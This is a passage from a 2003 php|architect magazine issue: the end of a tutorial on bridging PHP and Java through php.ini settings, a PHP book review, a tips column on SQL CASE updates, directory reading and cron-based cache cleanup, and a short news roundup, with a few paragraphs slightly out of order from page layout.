For some reason, PHP wants this extension to have that name. Because PHP is our friend, we try to make its life easier. Next, go back to your PHP source directory and cd into the ext/java directory. Copy the php_java.jar file to some place logical. I generally like to copy it into my extensions directory, just for the sake of consistency. This is a JAR file containing all of the classes required to create the PHP-to-Java bridge. Now that all of our files are in place, we can make the required changes to our php.ini. So, without getting into a religious discussion, open your favorite editor (mine being vi) and locate the 'extension' section. You'll want to make sure you have an uncommented line just like this:

extension=libphp_java.so

The next thing we need to do is modify the Java section in php.ini. Scroll down till you find Java and you will notice four directives:

java.class.path
java.home
java.library.path
java.library

java.class.path enables us to specify Java's class path as a directive. I would recommend reading the section entitled "The Class Path" in the Windows install notes, above, but in essence, Java's class path enables us to specify the locations of dependent libraries and classes. A location can be either an actual path or a JAR file. In our case, we just need to make sure that the php_java.jar file is specified in our java.class.path directive, and that the entire path is given. Your java.class.path should look something like:

java.class.path=/usr/lib/php/20020429/php_java.jar
As we get more into deploying our own Java classes, we'll have to append to our class path directive. In many full-blown Java applications, the class path can get amazingly long. That's okay, though, as the class path provides us with a great deal of flexibility. Let's get back to our other php.ini directives. java.home simply enables us to specify the location of our JDK, like so:

java.home=/usr/java1.3

Of course, if your JDK installation is somewhere else, then by all means specify that location here.

java.library.path has provided me with a great deal of angst and frustration, especially in my first forays into Java/PHP configuration. I found so many permutations of what this should look like that trying nearly all of them only resulted in repeated mistakes and thoughts of flinging myself out of the nearest window. What this directive requires is that we specify the location of our libphp_java.so object. For some reason (and I'm sure there's a good one) the extension directory directive isn't suitable for this, so we must specify something like this:

java.library.path=/usr/local/php4/lib/php/20020429

Now, the last directive, java.library, requires us to specify the JVM we wish to use. If you remember, we are using the "classic" JVM located in /usr/java1.3/jre/lib/i386/classic. So, this directive will look something like:

java.library=/usr/java1.3/jre/lib/i386/classic/libjvm.so

If something does not work, double-check your configuration settings. 99.999% of the problems I see go back to the configuration of PHP.

NOTE: If you receive something like the following error:

Fatal error: Unable to load Java Library /usr/local/jdk1.3.1_07/jre/lib/i386/classic/libjvm.so, error: /usr/local/jdk1.3.1_07/jre/lib/i386/classic/libjvm.so: undefined symbol: jdk_sem_post in /usr/local/httpd/htdocs/phpjava.php on line 4

try the installation again, this time setting your JVM to another type (server or hotspot).
Doing Something Interesting Okay, let’s do something interesting with our newfound skill and write a quick little Java class that we’ll then call from a PHP script. If you are using the Eclipse IDE (I can’t recommend this enough – http://www.eclipse.org), create a new Java project, then add a new Java Class (shown in Listing 2) to that project. If you are just using a standard text editor or some other IDE that doesn’t directly support Java, then you’ll need to use the JDK command line tools in order to compile. Eclipse has compile functions built-in to make life better. For those with Eclipse, just saving this source file compiles it. For those who aren’t using Eclipse, pop open a command prompt and navigate to where you saved this source file. Note that you should always save Java source code with a .java extension. It must be the same name (case sensitive) as your class. You’ll want to enter this command to compile your source code:
Wow, that should be it! Now give your php.ini a :wq (in vi) and bounce Apache and you should be all set. Now, now, you know I wouldn’t just leave you hanging. Let’s try her out, and make sure everything is hunky-dory. Next step is to test out our configuration with a simple test script, shown in Listing 1. You should see output like: The current time in milliseconds since epoch is: 1054742366703
If you get an error, it’s most likely a configuration problem. So double check your file locations and
September 2003
●
PHP Architect
●
www.phparch.com
C:\>javac HelloUniverse.java
or shell$>javac HelloUniverse.java
Listing 2

public class HelloUniverse {
    public HelloUniverse() {}

    public String saySomething(String message) {
        return "I was told to tell you: " + message;
    }
}
You should, assuming you don’t have any syntax errors, have a HelloUniverse.class file. Now that you have successfully compiled this small program, we need to append to our java.class.path directive in the php.ini file. This will tell the PHP engine where this class file lives. You should have something like the following:

java.class.path=c:\[php install]\extensions\php_java.jar;c:\mystuff\java

or

java.class.path=/[php install]/extensions/php_java.jar:/home/me/mystuff/java

It’s important to note that the “mystuff\java” directory is where the HelloUniverse.class file lives. We do NOT actually specify the name of the class on our class path. The only time we specify a specific file name on the class path is when we are telling the JVM that our classes live in a JAR file. So, with this change made to our php.ini file, we need to restart our Web server (if you are doing this through the Web). Next, let’s hack up a quick PHP script (Listing 3) that can use this class we just created.

Listing 3

<?php
$java = new Java("HelloUniverse");
$output = $java->saySomething("Look I got this to work!");
echo $output;
?>

You’ll notice the first line creates an instance of our Java class. Notice how we just pass in the name of the class? When folks come to me wondering why they get “NoClassDefFound” exceptions, I often see that the full file name of the class was specified, like “HelloUniverse.class”. In the land of Java, the period (.) is rather significant, as this is how you specify a hierarchy of classes. Many full-blown Java applications comprise lots of classes and interfaces, and instead of just lumping everything into one space, Java developers will break up the source code and create a logical hierarchical structure using subdirectories. The class names then start to take on names like:

com.mysql.jdbc.jdbc2.optional.MysqlConnectionPoolDataSource

Meaning, the class “MysqlConnectionPoolDataSource” lives in the directory:

com/mysql/jdbc/jdbc2/optional

Once we have our instance variable, which is represented by the $java object, we can then call methods in our class. This line:

$output = $java->saySomething("Look I got this to work!");

basically calls the saySomething() method (that is defined in our HelloUniverse class) and passes in a single string. You’ll remember the method definition in our HelloUniverse class accepts a single string as a parameter. We then assign the output of this method call to a new variable: $output. The saySomething() method’s return type is String, so we can then just echo or print the result of our call.

That’s pretty much it. With this knowledge in hand you should be able to successfully use all of the facilities and features that Java provides within your PHP application. With this functionality, a whole new world of possibilities is just waiting to be explored. The sheer number of Java-based applications, APIs, services and utilities is truly stunning, and now, with this simple primer, you can start integrating these goodies into your own applications. As you may have read in my last article, I used PHP to integrate the Lucene search engine, which saved me an enormous amount of time in that I did not have to worry about implementing my own search engine. Using some basic Java programming skills and then integrating a single class, I have a full-fledged searching and indexing system in my PHP application. So, repeat after me, “Java is my friend. It likes me. It doesn’t want to see me crying uncontrollably under my desk.”

About the Author

Dave is a professional geek specializing in Java/J2EE, PHP (naturally), and Perl development, which is just a cover for his real passion for spending large sums of money on home recording and musical equipment and generally making a nuisance of himself. It should also be noted that his /. karma is currently "positive", which will surely fall.
BOOK REVIEW

Core PHP Programming, 3rd Edition
Leon Atkinson with Zeev Suraski
1104 pages
Prentice Hall PTR
Core PHP Programming is the book that started it all. The first edition was the first English PHP book to market. Now in its third edition, Core PHP Programming continues to be a pioneer in the PHP world by jumping the gun and offering a full PHP5-compliant reference. Weighing in at over 1000 pages, it features an introduction to PHP, a large function reference, as well as information on PHP design patterns, algorithms, and common tasks. It boasts over 650 downloadable code examples and was coauthored by Zeev Suraski, co-creator of the Zend Engine (1 and 2) that drives PHP.

Because of other PHP books I'd read, I was a little skeptical as I first leafed through this one. I figured the function reference would be months out of date, and be a regurgitation of the http://php.net reference. I thought the other material would be cursory and uninspired. I just didn’t think there would be much value in a book like this (I don’t normally do book reviews). I was wrong, very wrong.

The function reference provided in the book is actually more complete than the http://php.net reference. For example, I found functions like debug_zval_dump() and output_add_rewrite_var() in the book that aren’t even documented on the web site. Doing a search on http://php.net only showed them appearing in recent PHP4 changelogs!

The introduction to PHP at the beginning of the book was excellent. It stepped through the different areas of programming with PHP, offering excellent explanations and loads of examples. This introduction should bring the beginner up to speed quickly, and even taught this experienced developer a few semantics.
Since the book is fully updated for PHP5, it contains a large amount of information on the new object features offered. Sporting the same clarity and rich examples as the rest of the book, this section is a must-read. On another note, it’s nice to see the author not attempt to delve into object-oriented theory. Many language books attempt to do this, and in most cases the treatment is incomplete enough to be distracting.

The last few chapters of the book contain solutions to common tasks and design considerations, all supplemented by a wealth of code examples. One particularly interesting chapter explains and demonstrates some common design patterns using the new PHP5 features.

Although this book is very well written, it is an early adopter book, which means that there are a few inconsistencies. The most notable of these is that although namespaces were dropped from PHP5, the book does contain a namespace section in the objects and classes chapter. My only other major complaint is that there isn’t any version information in the function reference. The book was written for PHP5, but excluding version information makes the book significantly less useful for those using older versions.

All in all, this is a great book! Beginners will find the introduction to PHP extremely well-written, and the annotated function reference very helpful; intermediate developers will find the function reference, algorithm, and design sections very useful; expert developers could pick a worse book to carry with them as an offline reference (although it is a bit bulky).
TIPS & TRICKS

Tips & Tricks
By John W. Holmes
Setting a Status with Radio Buttons

In most projects you come to a section where you want to present a list of items to your users and allow them to easily set some kind of status for each item. Say, for example, you’re displaying a listing of jobs to an administrator of a job site. You want to easily allow them to mark a job as Pending, Open, Closed, or Deleted. A straightforward approach would be to use drop down boxes with each status option. If you have a larger number of options, this is probably your best bet, anyhow, and would be rather easy to deal with. However, with a small number of options like those presented, a nice way to present them is by using HTML radio inputs.

The first issue you’ll notice, though, is that we need a way to tie each option to the specific job. That means that all four radio inputs must have the same name for each individual job so that only one status can be chosen per job. You could name each radio input as “status1” for one job, “status2” for the next, etc., but then it is not related to the actual job at all. You’ll have to provide extra code or logic to tie the two together. You could also name each set of four radio inputs as “status_XX” where XX is the unique job_id for the job. This means you’ll have to use some variable variable (http://us2.php.net/manual/en/language.variables.variable.php) trickery to get things to work on the processing side, though. I’m sure variable variables have their place, but in my opinion, you’re just avoiding using an array when you use them.

So, let’s use an array. I have discussed in previous columns how you can turn any input element into an array by adding brackets to the name. name="status[]", for example, will create a zero-based array upon submission, name="status[main][]" will create a multi-dimensional array upon submission, etc. We’re going to create a one-dimensional array to accomplish our needs, where the “key” to the array is the job_id and the “value” will be the status. An example of how this will look is shown in the first example of Listing 1. Each job will have a set of radio inputs sharing the name “status[XX]” where XX is the job_id, so the name is unique to that job. Now only one status can be chosen for each job.

That part was hopefully easy to follow and hopefully was something you’ve already seen. What we need now is an easy method to process the changes for each job. The straightforward approach, again, would be to just cycle through each status and issue an UPDATE query for each job. This method is shown in the first example in Listing 1. Depending on how many jobs you have per page, though, you may be running a dozen or more queries, one for each job. So a way to do this with a single query would be optimal.

We can accomplish this by working some CASE logic into our query. Each database should have an implementation of CASE, although the syntax may vary some from database to database. What we want to accomplish is to make a series of CASE conditions for each status that is chosen. The second example in Listing 1 shows how we can accomplish this.

First, we re-arrange the statuses passed into a multi-dimensional array called $data. The first key of $data will be the “status” of Pending, Open, etc., and then an element is added to this “status” array containing the value of the job_id. We end up with an array such as this:

Array(
    'pending' => Array(0 => 1234, 1 => 1235),
    'closed' => Array(0 => 1236, 1 => 1237),
    …

where 1234 – 1237 are the job_id numbers. We can now cycle through this array and create our SQL statement. The basic syntax of the CASE is going to be

status_column = CASE
    WHEN job_id IN (XX) THEN 'status'
    WHEN job_id IN (XX) THEN 'status'
    WHEN 1 THEN status_column
END
This is going to work just like a switch() in PHP. When the job_id matches one of the ID numbers in XX, then the value ‘status’ is supplied for that row. The final condition is like the default: case in a PHP switch(). If none of the other conditions are matched, then the status_column is set to itself, or, in other words, not changed.

Now, if you’re always updating every row in your table with your query, the “default” case is not needed. However, since we usually show a portion of our data, either paged or matching some criteria, the default CASE is required so that the remainder of the table rows are not set to NULL. This may be dependent upon your database’s implementation of CASE, but with MySQL and the syntax we are using, the status_column is set to NULL if no CASE is matched and the default CASE is not included. If you don’t account for this, you may end up wiping the status_column values from your table.

Listing 1

<?php
//Example 1
foreach($_POST['status'] as $job_id => $status)
{
    // Both values come from the form, so sanitize them before use
    $job_id = (int)$job_id;
    $status = mysql_real_escape_string($status);
    $query = "UPDATE jobs SET status = '$status' WHERE job_id = $job_id";
    $rs = mysql_query($query);
}

//Example 2 (Single UPDATE with CASE)
$data = array();
foreach($_POST['status'] as $id => $status)
{
    // Group the job IDs under their (escaped) status
    $data[mysql_real_escape_string($status)][] = (int)$id;
}

$query = "UPDATE jobs SET status = CASE ";
foreach($data as $status => $ar)
{
    $id_list = implode(',',$ar);
    $query .= " WHEN job_id IN ($id_list) THEN '$status' ";
}
$query .= " WHEN 1 THEN status END ";
$rs = mysql_query($query);
?>

Based on the array structure shown, we have a “pending” array full of job_id numbers that should be set to “pending”, a “closed” array full of job_id numbers that should be set to “closed”, etc. By cycling through this array, as shown in the second example of Listing 1, we can create our CASE logic by using implode() to create the list of ID numbers and grabbing the “key” from the data array to use as our “status”. After looping through the data, don’t forget to add the END to complete the CASE syntax.

The end result of all this is a single query that’ll update the status of each job. Example 1 in Listing 2 is an example of what a query would look like that is updating 20 different jobs to four different status values. While we end up creating a more complex query, we’re only running one query instead of multiple queries. While everyone should do their own benchmarking, my tests showed the CASE method to be 4-5 times faster than running multiple queries (when updating 20 jobs at a time).

An alternative to the “default” CASE, especially if your database implements this differently, is to create a WHERE condition that specifies all of the job_id numbers that should be updated. This way, the other rows in your table are left alone.
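The regrouping and query-building steps described above, in the WHERE-condition form, can be sketched as a single function that only builds the SQL string. This is an illustration rather than the column's own code: the name build_status_update() and the whitelist of allowed statuses are assumptions added here, and the table and column names (jobs, status, job_id) are taken from the example queries.

```php
<?php
// Hypothetical helper: builds one UPDATE ... CASE ... WHERE statement from
// a job_id => status array such as $_POST['status'].
function build_status_update(array $posted, array $allowed)
{
    // Regroup job_id => status into status => list of job_ids.
    $data = array();
    foreach ($posted as $jobId => $status) {
        // Skip anything that is not a known status or a non-negative integer ID.
        if (!in_array($status, $allowed, true) || !ctype_digit((string) $jobId)) {
            continue;
        }
        $data[$status][] = (int) $jobId;
    }
    if (!$data) {
        return null; // nothing valid to update
    }

    $whens = array();
    $allIds = array();
    foreach ($data as $status => $ids) {
        $whens[] = "WHEN job_id IN (" . implode(',', $ids) . ") THEN '$status'";
        $allIds = array_merge($allIds, $ids);
    }

    // The WHERE clause limits the update to the submitted jobs, so no
    // "default" branch is needed.
    return "UPDATE jobs SET status = CASE " . implode(' ', $whens)
         . " END WHERE job_id IN (" . implode(',', $allIds) . ")";
}

$posted = array(1 => 'pending', 2 => 'open', 7 => 'pending', 'x' => 'open', 3 => 'bogus');
echo build_status_update($posted, array('pending', 'open', 'closed', 'delete')), "\n";
// UPDATE jobs SET status = CASE WHEN job_id IN (1,7) THEN 'pending' WHEN job_id IN (2) THEN 'open' END WHERE job_id IN (1,7,2)
```

Because every status is checked against a fixed list and every ID is cast to an integer, nothing from the form reaches the query unfiltered; the resulting string can then be handed to whichever database function you use.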
The syntax for such a query is shown as the second example in Listing 2. I leave it up to you to find the easiest way to create that list (hint: array_keys($_POST['status'])). My benchmarks showed there was almost no difference in using the default CASE or the WHERE condition.

Listing 2

#Example query 1 (default CASE)
UPDATE jobs SET status = CASE
    WHEN job_id IN (1,7,13,19) THEN 'pending'
    WHEN job_id IN (2,6,8,12,14,18,20) THEN 'open'
    WHEN job_id IN (3,5,9,11,15,17) THEN 'closed'
    WHEN job_id IN (4,10,16) THEN 'delete'
    WHEN 1 THEN status
END

#Example query 2 (WHERE condition)
UPDATE jobs SET status = CASE
    WHEN job_id IN (1,7,13,19) THEN 'pending'
    WHEN job_id IN (2,6,8,12,14,18,20) THEN 'open'
    WHEN job_id IN (3,5,9,11,15,17) THEN 'closed'
    WHEN job_id IN (4,10,16) THEN 'delete'
END
WHERE job_id IN (1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20)

Last Day of the Month

Here’s a quick and simple tip for getting the last day of any month. The real trick is to actually
just ask for the “zero” day of the next month. The code in Listing 3 gives an example of how you do this. $lastdayofmonth is now a Unix timestamp for the last day of August, 2003 at 12:00pm. You can format that with date() or use any of the other date and time functions.

Reading Directories

PHP offers a couple of different ways to read directories and files from your local file system. The most common way is probably using opendir() and readdir(), as shown in the first example of Listing 4. You can specify the path to open with opendir(), and then with each call to readdir() the next file name is returned. For you object-oriented (OO) types, PHP also offers the built-in dir class as shown in the second example. Simply create a new “dir” object by passing the path. With each call to this object’s read() method, the next file name is returned. Each approach also provides a way to reset the directory handle back to the first file and to close the handle: rewinddir() and closedir() for the function-based approach, rewind() and close() on the dir object.

It is also worthwhile to note that the files are not returned in any particular sorted order when reading them. They are returned in the order in which the filesystem stores them, which is dependent upon the system. For this reason, the files are normally dumped into an array as they are read so that one of the various array sorting functions can be used.

A final method can be used to search for files matching a certain pattern. Since PHP 4.3.0, the glob() function will return an array of file names matching a pattern you specify. The pattern is the same type of pattern that you’d specify on the command line. So, say, for example, you have a directory full of images named image1.gif, image2.gif, etc. You could use glob() with a pattern of “image*.gif” to retrieve an array of all the image file names. The final example of Listing 4 shows an example usage of glob(). The PHP manual page for glob() has some examples of turning glob() into a recursive function so you can also search subdirectories for files matching a given pattern. Combine any of the above methods with is_file() or is_dir(), for example, and you’ll be able to do many things with the file system.

Using the Command Line to Clean Up Files

Mike Migurski offers up this advice for using command line functions for things that may be difficult to do in PHP:

Many PHP applications implement database caches or user sessions by storing persistent data in the filesystem. It’s a cheap way to emulate shared memory between requests, and can help make the most of limited system resources when many scripts are likely to need the results of expensive, though identical, database or remote server queries. This method does have a significant disadvantage: how does your application know when the information cached in the file system may be out of date, and how can you be sure that you are not accidentally serving up stale data?

Often, a problem that is difficult or inconvenient to solve using PHP can be approached using your operating system’s built-in tools, especially if you are running a variant of Unix. For example, if you have decided to cache frequently-requested SQL query results by storing files in /tmp, you may want these files to be automatically flushed when they are older than a few hours. Instead of performing the up-to-date checking in PHP, let ‘find’ handle it. The standard Unix ‘find’ program has a number of options that can narrow your search; ‘-cmin +120’ will match files whose status last changed more than 120 minutes ago (for a cache file that is written once, that is effectively when it was created), and ‘-type f’ will match only regular files, not directories or symbolic links. So, assuming that you have placed your query cache files in /tmp and named them all with ‘query_’ at the beginning, the following invocation of ‘find’ will return a list of all the files older than 2 hours:

find /tmp -name 'query_*' -type f -cmin +120
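On a host where you cannot run shell commands, roughly the same selection can be sketched in PHP with glob(). This is only an approximation under stated assumptions: the function name find_stale_files() is invented for illustration, and it compares against filemtime() (last modification) instead of the status-change time that -cmin uses, which is close enough for cache files that are written once.

```php
<?php
// Hypothetical helper approximating:
//   find DIR -name PATTERN -type f -cmin +MINUTES
// Assumption: filemtime() stands in for find's status-change time.
function find_stale_files($dir, $pattern, $maxAgeMinutes, $now = null)
{
    $now = ($now === null) ? time() : $now;
    $stale = array();
    $matches = glob(rtrim($dir, '/') . '/' . $pattern);
    if ($matches === false) {
        return $stale;
    }
    foreach ($matches as $path) {
        // Like -type f: skip directories and symbolic links.
        if (!is_file($path) || is_link($path)) {
            continue;
        }
        if ($now - filemtime($path) > $maxAgeMinutes * 60) {
            $stale[] = $path;
        }
    }
    return $stale;
}

// Demo in a scratch directory so nothing real is touched.
$dir = sys_get_temp_dir() . '/cache_demo_' . uniqid();
mkdir($dir);
touch("$dir/query_old", time() - 3 * 3600);  // three hours old
touch("$dir/query_new");                      // fresh
touch("$dir/other_old", time() - 3 * 3600);  // old, but wrong prefix

foreach (find_stale_files($dir, 'query_*', 120) as $path) {
    echo basename($path), "\n";  // only query_old qualifies
    unlink($path);
}
```

The shell version remains the simpler choice wherever it is available; the PHP sketch mainly shows that the two selection rules (name pattern and age) map directly onto glob() and a timestamp comparison.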
If you want to automatically delete the files in the resulting list, try piping the output of ‘find’ into ‘xargs’, a program whose sole purpose is to construct argument lists for named utilities. The following will construct a list of old files, and pass it on to ‘rm’ for removal:

find /tmp -name 'query_*' -type f -cmin +120 -print0 | xargs -0 rm
Finally, you will want to automatically run this command periodically, so that you don’t have to think about keeping your cache clean. Use the ‘cron’ program, which allows you to specify recurring commands and the times at which they will be run. The following entry in your crontab file will flush out your cache at the top of every hour, provided you have the necessary permissions to delete the cache files:

0 * * * * find /tmp -name 'query_*' -type f -cmin +120 -print0 | xargs -0 rm
(Each of the above commands should be on one line.)

Be Like Mike!

You, too, can be like Mike and have your tip or trick published in php|architect. Send any suggestions you have to [email protected] to be considered for publication.

About the Author
John Holmes is a Captain in the U.S. Army and a freelance PHP and MySQL programmer. He has been programming in PHP for over 4 years and loves every minute of it. He is currently serving at Ft. Gordon, Georgia as a Company Commander with his wife and two sons.
BITS & PIECES

Bits & Pieces
Real. Interesting. Stuff.
Mailinator

On Techdirt (www.techdirt.com) a while back, a new free email service called Mailinator (www.mailinator.com) was mentioned. Mailinator is a free email system in every sense of the word: it doesn’t cost anything, there is no sign up, and there are no access controls. What? No access controls? That’s right, you can check [email protected], [email protected], or [email protected], all without logging in.

Why do I care again? Because this offers a way to avoid giving away your Hotmail address, the one with the well-chosen, spam-free name, to a questionable site just to get access to some resource. No more going through the signup process for another dummy Hotmail account just to receive a password for some site. Now you give your email address as [email protected], submit, and go check that account’s email. No restrictions, and you’ll probably change that password as soon as you get it, anyway. If you don’t, no worries: emails are deleted after a few hours. Sure, somebody else could be checking my mail... but who cares? Security and privacy are not always one and the same.

Quote of the month

Taken from a PHP help forum, in a thread about right and wrong OO practices:

Person 1: “And then there’s the point from a little earlier about the reduced reusability due to the lack of orthogonality.”
Person 2: “What has bird watching got to do with it?”
Regular Expressions, Part 1

Everybody loves regular expressions, right? Wrong. Regular expressions can be a real pain in the ass if you’re just starting out. Questions like “It looks like it should work, but it doesn’t...”, or “How do I find URLs in a document where the link text isn’t ‘XYZ’?” are all too common on mailing lists and forums. Enter “The Regex Coach”:

http://www.weitz.de/regex-coach/

Here’s the abstract from the site:

The Regex Coach is a graphical application for Linux and Windows which can be used to experiment with (Perl-compatible) regular expressions interactively. It has the following features:

• It shows whether a regular expression matches a particular target string.
• It can also show which parts of the target string correspond to captured register groups or to arbitrary parts of the regular expression.
• It can “walk” through the target string one match at a time.
• It can simulate Perl’s split and s/// (substitution) operators.
• It tries to describe the regular expression in plain English.
• It can show a graphical representation of the regular expression’s parse tree.
• It can single-step through the matching process as performed by the regex engine.
• Everything happens in “real time”, i.e. as soon as you make a change somewhere in the application all other parts are instantly updated.

Check out Figure 1 for a shot of what it looks like.

Regular Expressions, Part 2

Although this is a magazine dedicated to PHP, sometimes tools available in other languages offer great potential for assisting your PHP coding. Besides, Perl is where PHP gets its regular expression syntax, anyway. In Part 1, we looked at a tool to help us see if a regular expression matches a string properly. In this part, I’d like to show you a Perl package called YAPE::Regex::Explain. This little guy provides a verbal explanation of what a given regex does. I was introduced to YAPE::Regex::Explain by Andy Hassall. He posted output from it on the comp.lang.php newsgroup in response to a regex question. In Table 1 (next page), I’ve included part of the post. Very cool, indeed. With the help of these two tools (The Regex Coach and YAPE::Regex::Explain), you should be well on your way to becoming a regular expression master.
The Game

Another interesting tidbit from the php|a forums. If you head over to www.phparch.com/discuss/viewtopic.php?t=253 you’ll see that “class_tranceaddict” has started a thread with an interesting concept. Remember that old game where somebody starts with a word, and each person in the room adds a word in turn, forming funny sentences? You can come up with some pretty crazy things, and you never know where it will lead. This forum thread started with:

class munchies { }

“class_tranceaddict” says:

Add a line to the following code, just one line, and personalize it, but make sure it doesn’t completely throw away the use of the code as you found it. Change slightly, but not drastically. All parts of the PHP language can be used. The idea is to create a little applet or class that does something in the end.
Figure 1
It will be interesting to see where it leads.

The Interview

Recently, on the php-general mailing list, there was a thread about how to separate the wheat from the chaff in a PHP job interview. Many suggestions were made, and some good ideas were presented. Jay Blanchard, for instance, offered up a puzzle as a way to see if the candidate can think.

In one room you have 3 light switches, each connected to one light bulb in another room. How many trips must you make to each room to determine which switch is connected to which light bulb?

Curt Zirzow offered the following solution to Jay’s puzzle:

toggle_light(1);
sleep(120);
toggle_light(1);
toggle_light(2);
move('self', 'room/');
if ($lightbulb['temp'] > $room['temp']) {
    echo "switch #1";
} elseif ($lightbulb['ison']) {
    echo "switch #2";
} else {
    echo "switch #3";
}
And John Holmes (our very own Tips and Tricks columnist) offered up the following nugget, which is particularly funny if you follow the php-general list:

PHP is server side, so it obviously cannot control light bulbs. Use Javascript.

It’s discussions like these that keep me following that high-volume list. Good work, all!

PHP Compilers Like Mushrooms?

You may remember a while back when our publisher Marco Tabini and John Coggeshall announced separately that they were working on proofs-of-concept for a PHP compiler capable of turning PHP code into binary executables. Marco's compiler provided its own parser for the PHP source and produced an output that could be compiled with any ANSI-compatible C compiler. John's version, on the other hand, plugged directly into the Zend Engine to transform its opcodes into assembler.

Now, a third project called BinaryPHP has been started; it converts PHP source into C++ code (presumably to take advantage of the latter's overloading features). Its development team has already completed a proof-of-concept, and is hard at work on its functionality. You can find BinaryPHP's homepage at http://binaryphp.sourceforge.net.
TABLE 1 The regular expression: (?-imsx:(?
NODE
EXPLANATION
(?-imsx:
group, but do not capture (case-sensitive) (with ^ and $ matching normally) (with . not matching \n) (matching whitespace and # normally):